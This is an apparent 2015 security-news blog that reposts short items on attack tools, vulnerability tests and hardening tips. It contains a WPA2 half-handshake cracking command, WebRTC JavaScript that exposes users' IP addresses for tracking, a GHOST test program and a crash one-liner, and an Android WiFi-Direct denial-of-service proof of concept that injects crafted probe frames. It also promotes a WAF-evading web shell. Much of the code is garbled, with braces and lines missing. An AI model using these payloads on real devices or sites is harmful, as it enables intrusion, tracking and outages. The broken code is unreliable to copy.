Jan 29, 2015

Tools: WPA2 HalfHandshake Crack

Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

$ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like"

Source:: http://n0where.net/wpa2-halfhandshake-crack/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Reveal Real IP Of Firefox and Chrome

Firefox and Chrome have implemented WebRTC that allow requests to STUN servers be made that will return the local and public IP addresses for the user. These request results are available to javascript, so you can now obtain a users local and public IP addresses in javascript. This demo is an example implementation of that.
Additionally, these STUN requests are made outside of the normal XMLHttpRequest procedure, so they are not visible in the developer console or able to be blocked by plugins such as AdBlockPlus or Ghostery. This makes these types of requests available for online tracking if an advertiser sets up a STUN server with a wildcard domain.

//get the IP addresses associated with an account
function getIPs(callback){
    var ip_dups = {};

    //compatibility for firefox and chrome
    var RTCPeerConnection = window.RTCPeerConnection
        || window.mozRTCPeerConnection
        || window.webkitRTCPeerConnection;
    var mediaConstraints = {
        optional: [{RtpDataChannels: true}]

    //firefox already has a default stun server in about:config
    //    media.peerconnection.default_iceservers =
    //    [{"url": "stun:stun.services.mozilla.com"}]
    var servers = undefined;

    //add same stun server for chrome
        servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};

    //construct a new RTCPeerConnection
    var pc = new RTCPeerConnection(servers, mediaConstraints);

    //listen for candidate events
    pc.onicecandidate = function(ice){

        //skip non-candidate events

            //match just the IP address
            var ip_regex = /([0-9]{1,3}(\.[0-9]{1,3}){3})/
            var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];

            //remove duplicates
            if(ip_dups[ip_addr] === undefined)

            ip_dups[ip_addr] = true;

    //create a bogus data channel

    //create an offer sdp

        //trigger the stun server request
        pc.setLocalDescription(result, function(){});

    }, function(){});

//Test: Print the IP addresses into the console

Source:: https://github.com/diafygi/webrtc-ips

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hipara - HIPS with Yara

Host intrusion prevention with the power of Yara

Source:: https://github.com/jbc22/hipara

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Videos: Shmoocon 2015 Videos: Playlist Version (January 2015)

Link:: https://archive.org/details/shmoocon-2015-videos-playlist


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hopper - Debug Application and Library in same time.

Hopper 3.7.3 is available. The most important feature of this release is the ability to debug multiple documents at once!
For instance, it is now possible to open a document with the main executable of an application, and another document with a framework used by the application. When you set breakpoints in these two documents, and launch the debugger, Hopper will make its best to show the correct document containing the current PC value

Source:: http://hopperapp.com/blog/?p=136

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Test GHOST Vulnerability and resource of its

Check Vulnerability
1. Test with code from Qualys(http://www.openwall.com/lists/oss-security/2015/01/27/9) or download from http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c

# wget "http://webshare.uchicago.edu/orgs/ITServices/itsec/Downloads/GHOST.c"

# gcc -o ghost GHOST.c
# ./ghost

###### Source code here
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

#define CANARY "in_the_coal_mine"

struct {
  char buffer[1024];
  char canary[sizeof(CANARY)];
} temp = { "buffer", CANARY };

int main(void) {
  struct hostent resbuf;
  struct hostent *result;
  int herrno;
  int retval;

  /*** strlen (name) = size_needed - sizeof (*host_addr) - sizeof (*h_addr_ptrs) - 1; ***/
  size_t len = sizeof(temp.buffer) - 16*sizeof(unsigned char) - 2*sizeof(char *) - 1;
  char name[sizeof(temp.buffer)];
  memset(name, '0', len);
  name[len] = '\0';

  retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer), &result, &herrno);

  if (strcmp(temp.canary, CANARY) != 0) {
  if (retval == ERANGE) {
    puts("not vulnerable");
  puts("should not happen");

###### End of Source code.
if it echo "vulnerable" that means your linux has GHOST vulnerable, if not and it echo "not vulnerable" that mean your linux is safe.

2. Check from version of glibc
# ldd --version
if you're Debian/Ubuntu guys, you must have glibc > glibc 2.18

If you're CentOS/Redhat Enterprise Linux, you must have glibc 2.12-1.149
3. Check with php
# php -r '$e="0";for($i=0;$i<2500;$i++){$e="0$e";} gethostbyname($e);'
if it's segmentation fault, it means you're vulnerable.

4. Check which application that use glibc library
# lsof | grep libc | awk '{print $1}' | sort | uniq

How to fix
1. Debian/Ubuntu
Fix with 
# apt-get update && apt-get upgrade && apt-get dist-upgrade

2. CentOS/Redhat Enterprise Linux
Fix with 
# yum clean all && yum update

-    http://www.frsag.org/pipermail/frsag/2015-January/005722.html
-    https://community.qualys.com/blogs/laws-of-vulnerabilities/2015/01/27/the-ghost-vulnerability
-    http://www.beej.us/guide/bgnet/output/html/multipage/gethostbynameman.html
-    http://man7.org/linux/man-pages/man3/gethostbyname.3.html
-    http://lcamtuf.blogspot.co.uk/2015/01/technical-analysis-of-qualys-ghost.html
-    http://www.openwall.com/lists/oss-security/2015/01/27/9
-    http://www.cyberciti.biz/faq/cve-2015-0235-patch-ghost-on-debian-ubuntu-fedora-centos-rhel-linux/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 27, 2015

Android WiFi-Direct Denial of Service

Android WiFi-Direct Denial of Service

1. *Advisory Information*

Title: Android WiFi-Direct Denial of Service
Advisory ID: CORE-2015-0002
Advisory URL:
Date published: 2015-01-26
Date of last update: 2015-01-26
Vendors contacted: Android Security Team
Release mode: User release

2. *Vulnerability Information*

Class: Uncaught Exception [CWE-248]
Impact: Denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0997

3. *Vulnerability Description*

   Some Android devices are affected by a Denial of Service attack when
   scanning for WiFi Direct devices.

   An attacker could send a specially crafted 802.11 Probe Response frame
   causing the Dalvik subsystem to reboot because of an Unhandle Exception
   on WiFiMonitor class.

4. *Vulnerable Packages*

   . Nexus 5 - Android 4.4.4
   . Nexus 4 - Android 4.4.4
   . LG D806 - Android 4.2.2
   . Samsung SM-T310 - Android 4.2.2
   . Motorola RAZR HD - Android 4.1.2

   Other devices could be also affected.

5. *Non-vulnerable packages*

   . Android 5.0.1
   . Android 5.0.2

6. *Vendor Information, Solutions and Workarounds*

   Some mitigation actions may be to avoid using WiFi-Direct or update
to a non-vulnerable Android version.
   Contact vendor for further information.

7. *Credits*

   This vulnerability was discovered and researched by Andres Blanco
from the CoreLabs
   Team. The publication of this advisory was coordinated by the Core

8. *Technical Description / Proof of Concept Code*

   Android makes use of a modified *wpa_supplicant*[1]
   in order to provide an interface between the wireless driver and the
Android platform framework.

   Below the function that handles *wpa_supplicant* events. This function
   returns a jstring from calling NewStringUTF method.

    static jstring android_net_wifi_waitForEvent(JNIEnv* env, jobject)
        char buf[EVENT_BUF_SIZE];
        int nread = ::wifi_wait_for_event(buf, sizeof buf);
        if (nread > 0) {
            return env->NewStringUTF(buf);
        } else {
        return NULL;

   The WiFi-Direct specification defines the P2P discovery procedure to
enable P2P
   devices to exchange device information, the device name is part of
this information.

   The WifiP2pDevice class, located at
   represents a Wi-Fi p2p device. The constructor method receives the
string provided by
   the *wpa_supplicant* and throws an IllegalArgumentException in case
   the event is malformed.

   Below partial content of the WiFiP2PDevice.java file.


        /** Detailed device string pattern with WFD info
         * Example:
         *  P2P-DEVICE-FOUND 00:18:6b:de:a3:6e
         *  pri_dev_type=1-0050F204-1 name='DWD-300-DEA36E'
         *  dev_capab=0x21 group_capab=0x9
        private static final Pattern detailedDevicePattern =
            "((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "(\\d+ )?" +
            "p2p_dev_addr=((?:[0-9a-f]{2}:){5}[0-9a-f]{2}) " +
            "pri_dev_type=(\\d+-[0-9a-fA-F]+-\\d+) " +
            "name='(.*)' " +
            "config_methods=(0x[0-9a-fA-F]+) " +
            "dev_capab=(0x[0-9a-fA-F]+) " +
            "group_capab=(0x[0-9a-fA-F]+)" +
            "( wfd_dev_info=0x000006([0-9a-fA-F]{12}))?"


         * @param string formats supported include
         *  P2P-DEVICE-FOUND fa:7b:7a:42:02:13
         *  pri_dev_type=1-0050F204-1 name='p2p-TEST1'
config_methods=0x188 dev_capab=0x27
         *  group_capab=0x0 wfd_dev_info=000006015d022a0032
         *  P2P-DEVICE-LOST p2p_dev_addr=fa:7b:7a:42:02:13
         *  AP-STA-CONNECTED 42:fc:89:a8:96:09
         *  AP-STA-DISCONNECTED 42:fc:89:a8:96:09
         *  fa:7b:7a:42:02:13
         *  Note: The events formats can be looked up in the
wpa_supplicant code
         * @hide
        public WifiP2pDevice(String string) throws
IllegalArgumentException {
            String[] tokens = string.split("[ \n]");
            Matcher match;

            if (tokens.length < 1) {
                throw new IllegalArgumentException("Malformed supplicant

            switch (tokens.length) {
                case 1:
                    /* Just a device address */
                    deviceAddress = string;
                case 2:
                    match = twoTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");
                    deviceAddress = match.group(2);
                case 3:
                    match = threeTokenPattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");
                    deviceAddress = match.group(1);
                    match = detailedDevicePattern.matcher(string);
                    if (!match.find()) {
                        throw new IllegalArgumentException("Malformed
supplicant event");

                    deviceAddress = match.group(3);
                    primaryDeviceType = match.group(4);
                    deviceName = match.group(5);
                    wpsConfigMethodsSupported = parseHex(match.group(6));
                    deviceCapability = parseHex(match.group(7));
                    groupCapability = parseHex(match.group(8));
                    if (match.group(9) != null) {
                        String str = match.group(10);
                        wfdInfo = new

            if (tokens[0].startsWith("P2P-DEVICE-FOUND")) {
                status = AVAILABLE;


   On some Android devices when processing a probe response frame with a
   information element that contains a device name attribute with
specific bytes generates
   a malformed supplicant event string that ends up throwing the
   As this exception is not handled the Android system restarts.

   Below partial content of the logcat of a Samsung SM-T310 running
Android 4.2.2.

      I/p2p_supplicant( 2832): P2P-DEVICE-FOUND 00.EF.00
p2p_dev_addr=00.EF.00 pri_dev_type=10-0050F204-5  'fa¬¬'
config_methods=0x188 dev_capab=0x21 group_capab=0x0
      E/AndroidRuntime( 2129): ! () *** FATAL EXCEPTION IN SYSTEM PROCESS:
      E/AndroidRuntime( 2129): java.lang.IllegalArgumentException:
Malformed supplicant event
      E/AndroidRuntime( 2129):        at
      E/AndroidRuntime( 2129):        at
      E/AndroidRuntime( 2129):        at
      E/android.os.Debug( 2129): ! () Dumpstate > dumpstate -k -t -z -d -o

8.1. *Proof of Concept*

   This PoC was implemented using the open source library Lorcon
   [2] and PyLorcon2 [3], a Python wrapper for the Lorcon library.

    #!/usr/bin/env python

    import sys
    import time
    import struct
    import PyLorcon2

    def get_probe_response(source, destination, channel):
        frame = str()
        frame += "\x50\x00"  # Frame Control
        frame += "\x00\x00"  # Duration
        frame += destination
        frame += source
        frame += source
        frame += "\x00\x00"  # Sequence Control
        frame += "\x00\x00\x00\x00\x00\x00\x00\x00"  # Timestamp
        frame += "\x64\x00"  # Beacon Interval
        frame += "\x30\x04"  # Capabilities Information

        # SSID IE
        frame += "\x00"
        frame += "\x07"
        frame += "DIRECT-"

        # Supported Rates
        frame += "\x01"
        frame += "\x08"
        frame += "\x8C\x12\x98\x24\xB0\x48\x60\x6C"

        # DS Parameter Set
        frame += "\x03"
        frame += "\x01"
        frame += struct.pack("B", channel)

        # P2P
        frame += "\xDD"
        frame += "\x27"
        frame += "\x50\x6F\x9A"
        frame += "\x09"
        # P2P Capabilities
        frame += "\x02" # ID
        frame += "\x02\x00" # Length
        frame += "\x21\x00"
        # P2P Device Info
        frame += "\x0D" # ID
        frame += "\x1B\x00" # Length
        frame += source
        frame += "\x01\x88"
        frame += "\x00\x0A\x00\x50\xF2\x04\x00\x05"
        frame += "\x00"
        frame += "\x10\x11"
        frame += "\x00\x06"
        frame += "fafa\xFA\xFA"

        return frame

    def str_to_mac(address):
        return "".join(map(lambda i: chr(int(i, 16)), address.split(":")))

    if __name__ == "__main__":
        if len(sys.argv) != 3:
            print "Usage:"
            print "  poc.py <iface> <target>"
            print "Example:"
            print "  poc.py wlan0 00:11:22:33:44:55"

        iface = sys.argv[1]
        destination = str_to_mac(sys.argv[2])

        context = PyLorcon2.Context(iface)

        channel = 1
        source = str_to_mac("00:11:22:33:44:55")
        frame = get_probe_response(source, destination, channel)

        print "Injecting PoC."
        for i in range(100):
Source:: http://seclists.org/fulldisclosure/2015/Jan/104 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 26, 2015

Tools: sshttp - hiding SSH servers behind HTTP

In case your FW policy forbids SSH access to the DMZ or internal network from outside, but you still want to use ssh on machines which only have one open port, e.g. HTTP, you can use sshttpd.
sshttpd can multiplex the following protocol pairs:
  • SSH/SMTP (without SMTP multiline banners)
Source:: https://github.com/stealth/sshttp

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Advanced Web Shell

There's multiple things that makes DAws better than every Web Shell out there:
  1. Bypasses Disablers; DAws isn't just about using a particular function to get the job done, it uses up to 6 functions if needed, for example, if shell_exec was disabled it would automatically use exec or passthru or system or popen or proc_open instead, same for Downloading a File from a Link, if Curl was disabled then file_get_content is used instead and this Feature is widely used in every section and fucntion of the shell.
  2. Automatic Random Encoding; DAws randomly encodes automatically most of your GET and POST data using Java Script or PHP which will allow your shell to Bypass pretty much every WAF out there.
  3. Advanced File Manager; DAws's File Manager contains everything a File Manager needs and even more but the main Feature is that everything is dynamically printed; the permissions of every File and Folder are checked, now, the functions that can be used will be available based on these permissions, this will save time and make life much easier.
  4. Tools: DAws holds bunch of useful tools such as "bpscan" which can identify useable and unblocked ports on the server within few minutes which can later on allow you to go for a bind shell for example.
  5. Everything that can't be used at all will be simply removed so Users do not have to waste their time. We're for example mentioning the execution of c++ scripts when there's no c++ compilers on the server(DAws would have checked for multiple compilers in the first place) in this case, the function would be automatically removed and the User would know.
  6. Supports Windows and Linux.
  7. Openned Source.
Source:: https://github.com/dotcppfile/DAws

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: malwaRE- Malware repository framework

Malware exist with different behavior and many security research teams install distributed honeypots to detect new malwares. the honeypots will emulate vulnerable services that attract malwares and  they help to catch new binaries. if you are in the malware research field you can take a look at malwaRE project.
malwaRE is a malware repository that helps researchers to store their samples for further analysis or to keep track of any old samples that will be needed in the future. some of the features are:
  • Self-hosted solution (PHP/Mysql server needed)
  • VirusTotal results (option for uploading unknown samples)
  • Search filters available (vendor, filename, hash, tag)
  • Vendor name is picked from VirusTotal results in that order: Microsoft, Kaspersky, Bitdefender
  • Add writeup url(s) for each sample
  • Manage samples by tag
  • Tag autocomplete
  • VirusTotal rescan button (VirusTotal’s score column)
  • Download samples from repository
Source:: http://www.sectechno.com/malware-malware-repository-framework/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Windows Exploit Suggester

This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

It requires the ‘systeminfo’ command output from a Windows host in order to compare that the Microsoft security bulletin database and determine the patch level of the host.
It has the ability to automatically download the security bulletin database from Microsoft with the –update flag, and saves it as an Excel spreadsheet.
When looking at the command output, it is important to note that it assumes all vulnerabilities and then selectively removes them based upon the hotfix data. This can result in many false-positives, and it is key to know what software is actually running on the target host. For example, if there are known IIS exploits it will flag them even if IIS is not running on the target host.
The output shows either public exploits (E), or Metasploit modules (M) as indicated by the character value.
It was heavily inspired by Linux_Exploit_Suggester by Pentura.

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Block request from China


# cn.zone comes from http://www.ipdeny.com/ipblocks/
# build the rules with:
# $ build_rules > /tmp/china_rules
# apply rules with:
# $ sudo ipfw /tmp/china_rules 

while read line; do
 echo "add $r deny ip from " $line " to any in";
 r=$(( $r + 1 ))
done < cn.zone

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Apache denied reuest that ServerName undefined

Apache Configuration

My first thought was to deal with the traffic was by handling the HTTP traffic more efficiently.
We host several sites on our server and use VirtualHost to route traffic on a single IP address to multiple websites. Virtual hosts rely on the “Host:” header in the HTTP request to determine where the traffic should head, and as we’ve seen above, the host information was totally bogus.
One thing I learned is that Apache can have problems figuring out which virtual host to use in some cases:
If no ServerName is specified, then the server attempts to deduce the hostname by performing a reverse lookup on the IP address.
Remember that millions of requests had a host name that would need to be looked up. After consulting the documentation, I setup a virtual host that would quickly return a 404 error for the request and display a special message at the root directory. Here’s what it looks like:
<VirtualHost _default_:80>
    ServerName default
    DocumentRoot "/Web/Sites/default"
    <Directory "/Web/Sites/default">
        Options None
        AllowOverride None
        DAV Off
    LogLevel warn
Source:: http://furbo.org/2015/1/22/fear-china/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Appie – Android Pentesting Portable Integrated Environment

Why Appie was created ?
Just because i wanted something awesome instead of traditional virtual machines.
Difference between Appie and existing environments ?
    •    Tools contained in Appie are running on host machine instead of running on virtual machine.
    •    Less Space Needed(Only 600MB compared to atleast 8GB of Virual Machine)
    •    As the name suggests it is completely Portable i.e it can be carried on USB Stick or on your own smartphone and your pentesting environment will go wherever you go without any differences.
    •    Awesome Interface

What Does Appie Mean ?
In the search for an awesome name ,i found Appie which stands for Android Pentesting Portable Inegrated Environment and the most important thing the name define itself.
Getting Started
    •    Download the file.
    •    Unzip the file.
    •    Click on the executable Appie in the extracted folder.
    •    Go through the Usage
I have also started a series on Android Application Security Series for the ones who need to learn about android application security.In that series i have used Appie extensively.

Which tools are included in Appie ?    •    Drozer
    •    dex2jar
    •    Androguard
    •    Introspy-Analyzer
    •    Jd-Gui
    •    Android Debug Bridge
    •    Apktool
    •    Sublime Text
    •    Androguard SublimeText Plugin
    •    Eclipse with Android Developer Tools
    •    Owasp GoatDroid Project Configured
    •    Fastboot and sqlite3
    •    Nearly all UNIX commands like ls, cat, chmod, cp, find, git, unzip, mkdir, ssh, openssl, keytool ,jarsigner and many others


Source:: http://manifestsecurity.com/appie/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.